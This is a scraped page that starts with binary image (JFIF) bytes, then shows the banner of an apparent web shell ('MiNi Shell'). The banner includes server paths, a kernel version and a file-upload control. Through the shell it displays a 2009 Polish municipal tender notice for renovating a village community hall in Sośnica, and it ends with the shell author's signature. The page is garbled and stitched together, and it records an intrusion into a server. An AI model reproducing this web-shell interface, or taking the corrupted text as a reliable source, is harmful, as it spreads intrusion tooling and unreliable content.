JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090506/134716-N-2009.html

<p class="kh_header"><b>Dobrzyca: REMONT  ŚWIETLICY  WIEJSKIEJ - DOMU STRAŻAKA W  SOŚNICY</b><br>
<b>Numer ogłoszenia: 134716 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobrzyca , Rynek 14, 63-330 Dobrzyca, woj. wielkopolskie, tel. 062 7413013, faks 062 7413013.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dobrzyca.bazagmin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT  ŚWIETLICY  WIEJSKIEJ - DOMU STRAŻAKA W  SOŚNICY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> REMONT  ŚWIETLICY  WIEJSKIEJ - DOMU STRAŻAKA W  SOŚNICY

Zakres rzeczowy obejmuje remont świetlicy wiejskiej - Domu Strażaka w Sośnicy w szczególności:
-wykonanie okładziny schodów wejściowych oraz podjazdu dla niepełnosprawnych z kostki betonowej i balustrady z rury stalowej,
-wymianę drzwi wejściowych drewnianych na aluminiowe,
-wymianę okien drewnianych na PCV,
-wymianę pokrycia dachowego na blacho dachówkę wraz z malowaniem konstrukcji dachowej,
-demontaż boazerii na ścianach i suficie,
-wykonanie sufitu z technologii  G-K,
-gipsowanie i malowanie ścian i sufitu sali,
-odnowienie posadzki poprzez szlifowanie i lakierowanie,
-termomodernizacja ścian zewnętrznych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.43.00.00-0, 45.42.10.00-4, 45.41.00.00-4, 45.32.00.00-6, 45.26.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości : 3.000,00 zł
(słownie: trzy tysiące zł) 
Wadium  musi  obejmować  okres  związania ofertą, tj. 30 dni  liczone  od  ostatecznego  terminu  składania  oferty.
Termin wniesienia wadium upływa dnia  02.06.2009 r.  o godz. 9:00<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie  zamówienia  mogą się  ubiegać Wykonawcy, którzy  spełniają  następujące warunki:
1)posiadają  uprawnienia  do  wykonywania  określonej działalności lub czynności,  jeżeli  ustawy  nakładają  obowiązek  posiadania  takich  uprawnień,
2)posiadają  niezbędną  wiedzę i doświadczenie oraz potencjał techniczny  a  także  dysponują   osobami  zdolnymi do wykonywania zamówienia,
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,  
4)nie  podlegają  wykluczeniu  z  postępowania  o  udzielenie  zamówienia  zgodnie  z  art. 24 ustawy z  dnia 24 stycznia 2004 r. Prawo zamówień publicznych,
5)udokumentują, że w okresie ostatnich trzech  lat  a jeżeli okres prowadzenia działalności jest    krótszy -  w tym okresie należycie i rzetelnie wykonali co najmniej trzy roboty budowlane porównywalne z robotami będącymi przedmiotem niniejszego zamówienia tj. wykonali roboty o wartości nie  mniejszej niż wartość podana do oferty na powyższe zadanie, (rozpoczęcie nie wcześniej niż 3  lata temu licząc od dnia wszczęcia niniejszego postępowania, a które  zostały ukończone).Należy podać adresy inwestorów obiektów realizowanych w ramach tych zamówień. W przypadku  składania  oferty  przez  podmioty  wspólne,  warunek  musi  spełnić  co  najmniej   jeden podmiot. 
6)Wykonawca powinien dysponować kadrą inżynieryjno-techniczną z uprawnieniami budowlanymi  do kierowania robotami w branżach: ogólnobudowlanych. Osobami  legitymującymi się doświadczeniem i kwalifikacjami odpowiednimi do stanowisk, jakie zostaną im powierzone. Zamawiający wymaga, aby kierownik budowy posiadał przygotowanie zawodowe upoważniające do wykonywania samodzielnych funkcji kierownika budowy  i robót w specjalności ogólnobudowlanej oraz  aktualne  zaświadczenie  o  przynależności  do Okręgowej Izby Samorządu Zawodowego,
7)przedstawią  wykaz sprzętu niezbędnego do wykonania  przedmiotu  zamówienia  w  oparciu  o  wymagania sprzętowe wynikające  z  projektu  budowlanego oraz  specyfikacji technicznej, miedzy innymi rusztowanie ramowe elewacyjne,
8)każdy z Wykonawców zobowiązany jest do zapoznania się z uzgodnieniami z zarządcami infrastruktury technicznej występującej na terenie  inwestycji oraz ich stosowania,
9)każdy z Wykonawców zobowiązany jest do udzielenia Zamawiającemu gwarancji na okres min.  36  miesięcy  od  odbioru  robót,
10)rozliczenia między Zamawiającym a Wykonawcą będą prowadzone w złotych polskich,
11) rozliczenie robót objętych umową  następować będzie fakturą przejściową, wystawioną na Urząd Gminy (dwie faktury na całość zadania tj. w miesiącu listopadzie 2009 r. i  marcu 2010 r.) za roboty wykonane w tym okresie zgodnie z harmonogramem rzeczowo-finansowym.
Ocena  spełnienia  warunków  wymaganych od Wykonawców zostanie dokonana na podstawie złożonych dokumentów wg formuły spełnia, nie  spełnia.
Niespełnienie  powyższych  wymogów  spowoduje  wykluczenie  Wykonawcy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta  powinna  zawierać niżej wymienione dokumenty:
1)dowód  wniesienia  wadium,
2)formularz  ofertowy  -  wg  wzoru do SIWZ  (zał. nr 2),
3)zestawienie wartości kwoty ryczałtowej brutto - wg wzoru do SIWZ (zał. nr 3) wykonany na  podstawie: robót wynikających  z projektów budowlanych, z przedmiarów robót i specyfikacji  technicznej oraz robót niezbędnych do wykonania przedmiotu zamówienia,
4)oświadczenie Wykonawcy  o  spełnieniu  warunków udziału  w  postępowaniu  określonych w  art.22 ust. 1 ustawy - wg  wzoru do  SIWZ (zał. nr 4),
5)zaakceptowany  projekty  umowy - wg  wzoru do SIWZ (zał. nr 5),
6)tabela czynników  cenotwórczych - wg wzoru do SIWZ (zał. nr 6),
7)wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonaniu   Zamówienia  (zał. nr 7)   oraz załączyć potwierdzenie o posiadaniu uprawnień zawodowych branży ogólnobudowlanej potwierdzające kwalifikacje osoby wskazanej do pełnienia   funkcji  kierownika  robót  wraz z  aktualnym  na  dzień  składania  ofert zaświadczeniem potwierdzającym jej członkostwo we właściwej terenowo izbie samorządu zawodowego,
8)wykaz  sprzętu, którym będzie dysponował Wykonawca przy realizacji niniejszego zamówienia, wymagania  określa  specyfikacja  techniczna  (zał. nr 8),
9)aktualny  odpis  z  właściwego  rejestru  albo  zaświadczenie  o  wpisie  do ewidencji  działalności  gospodarczej,  jeżeli  odrębne  przepisy  wymagają  wpisu  do  rejestru lub zgłoszenia do ewidencji  działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
10)wykaz  co  najmniej  trzech  robót budowlanych   wykonanych  w  okresie  trzech  lat, a  jeżeli    okres prowadzenia działalności jest krótszy - w tym okresie, w  zakresie będącym przedmiotem  zamówienia, z podaniem ich zakresu  rzeczowego, wartości, daty wykonania i odbiorów wraz z  załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie (referencje,  listy polecające) (zał. nr 9),
11)harmonogram rzeczowo-finansowy  (zał. nr 10),  Przy opracowywaniu harmonogramu należy uwzględnić fakt, że Zamawiający w roku 2009  zamierza przeznaczyć kwotę 180.000,00 zł, w roku 2010 pozostałą wartość zadania,
12)wykaz podwykonawców do wykonania zamówienia  (zał. nr 11),
13)oświadczenie o zastosowaniu materiałów i urządzeń, które spełniają wymagania wynikające z Polskich Norm przenoszące normy europejskie (zał. nr 12)
Dokumenty, o  których mowa  w punktach 7, 10 mogą  być przedstawione w formie oryginału  lub    kserokopii  poświadczonej  za  zgodność  z  oryginałem przez Wykonawcę, pozostałe  dokumenty    należy złożyć w oryginale..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dobrzyca.bazagmin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy, ul. Rynek 14, 63-330 Dobrzyca, cena: 39,00 zł brutto + koszty przesyłki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2009 godzina 09:00, miejsce: Urząd Gminy, ul. Rynek 14, 63-330 Dobrzyca - pokój nr 15..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com